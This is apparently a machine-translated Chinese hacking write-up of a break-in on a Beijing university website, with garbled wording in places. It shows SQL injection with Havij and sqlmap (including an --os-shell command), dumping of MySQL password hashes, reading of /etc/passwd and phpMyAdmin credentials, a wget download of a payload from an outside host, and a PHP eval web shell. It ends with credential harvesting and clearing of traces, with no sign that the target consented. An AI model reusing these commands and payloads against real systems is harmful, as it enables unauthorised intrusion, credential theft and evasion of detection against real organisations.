Friendship Detection: A university website in Beijing

0x00 Information Collection

I accidentally discovered an injection link. I don't know how to find it. It's not a scan.

Http://www.bkjia.com/xxxxxx? Id = 12

Google finds the background

Site: f4ck.edu. cninurl: admin

Http://www.bkjia.com/xxx. php

0x01 account password acquisition

Use the injection point first.

Drop into Havij and run out of Database

Run the database account password

An error occurred while cracking the admin password,

Then crack other users and obtain the 123xxxxx password. After logging in, there is no usable location, as shown in figure

Check other super administrators, and the password is not cracked successfully. One of the five shows that the password is cracked successfully, but you need to purchase

In fact, even if you purchase it, it will prompt that it cannot be cracked. I wiped it.

Continue. See mysql

Read the account password information and find phpmyadmin

First read the user password information of mysql

 

Data

Found:

User = xxx

 

Data

Data

Data

Data

Data

Found:

Found:

Found:

Found:

Found:

Password = * 3A3DAA719C86DA543FF1A9E27DB6E59xxxxxxxxx

User = pku_xxx

Password = * 3EDC2D4C98204DC580FCE638B8B3FA7xxxxxxxxx

User = root

Password = * EF9C0D7D80D1B158F3958176F869AAC9xxxxxxxx

When you check the root password, you are prompted to purchase it again. When you want to purchase it, you are prompted that it cannot be decrypted. Fuck.

 

0x02 battle phpmyadmin

No hope to transfer shell to the backend.

Add phpmyadmin after the website

If you lose several frequently used account passwords, no results will be returned. Let's look at the function of reading the file.

To read the content of the/etc/passwd file.

G-7

 

After that is to see can know the default configuration file, according to the server information G-8, Judge is Apache after entering

Default installation directory, default configuration file,

Read/etc/issue to get the operating system Ubuntu10.10 \ n \ l

Failed to read/usr/local/apache/conf/httpd. conf

Failed to read/usr/local/apache/conf/httpd. conf

The tool prompts Iamidle .....

Then I continued to guess the directory. The phpmyadmin path was not found. This phpmyadmin seems a bit strange.

Then Google

Site: www.2cto.com warning:

Site: www.2cto.com error:

Not even. And then fight for the character.

 

0x03 xampp found

User

Listen to the first love song and continue.

Suddenly, the phpmyadmin login interface contains

Then search for the xampp default installation information G-9

Xamppuser

F.

File/Directory

Purpose

/Opt/lampp/bin/

/Opt/lampp/htdocs/

/Opt/lampp/etc/httpd. con

F/opt/lampp/etc/my. cnf

 

/Opt/lampp/etc/php. ini

/Opt/lampp/etc/proftpd. c

Onf

/Opt/lampp/phpmyadmin/co

Nfig. inc. php

TheXAMPPcommandshome./opt/lampp/bin/mysqlcallsfor

ExampletheMySQLmonitor.

TheApacheDocumentRootdirectory.

TheApacheconfigurationfile.

TheMySQLconfigurationfile.

ThePHPconfigurationfile.

TheProFTPDconfigurationfile. (since0.9.5)

ThephpMyAdminconfigurationfile.

Read files

Read/opt/lampp/phpmyadmin/config. inc. php

Get information G-10

 

$ Cfg ['servers'] [$ I] ['user']

= 'Root ';

$ Cfg ['servers'] [$ I] ['Password']

= '91xxx ';

But its highlight is commentskey ..

Decisively connect phpmyadmin, and then I will wipe it out. The input does not respond. What is this.

Then read the file to see if the configuration file can be read.

Read/opt/lampp/htdocs/index. php

Find the configuration file,

G-11

60th pages 633 pages

Continue reading/opt/lampp/htdocs/inc/conn. php

No password.

After that, you can write a trojan file, but pangolin is not written.

Itsaidthetargetmustsetmagic_quotes_gpctooff

Execute database query statements

Select ''export outfile'/opt/lampp/htdocs/fuck. php'

Failed

 

0x04 pick up Sqlmap

Then I think of sqlmap, which plays a shell.

Command: sqlmap. py-u "http://www.bkjia.com/xxx. php? Id = 12 "-- OS-shell

Enter the web path/opt/lampp/htdocs/and then pop up the shell, G-12

View whoami

G-13

Lscat commands such as cdvi cannot be executed.

The command is successful if ls/is input during the column directory.

The wget command can be used later, but it is obviously mentally retarded. The amount of wgethttp: // fuck. uk/a. php can be directly used ..

Then wget

Cata.txt

Result:

Http://fuck.uk/a.txt

After that, we found that we could not rename the file. After trying, we could not decompress the file wget. .. Actually cp

You can directly execute cpa.txt a. php. Connection with kitchen knife, failed .. Fuck ....

Then I read the next sentence.

 

If php Sets

And mv is

Short_open_tag is open.

After wget again

G-14

?>

So it is best to use

Eval ($ _ request [fuck])?>

Kitchen Knife connection G-15

OK... do not do it first.

 

0x05 Sensitive Information Collection

Search various account and password information and clear traces

Suggestion

No suggestion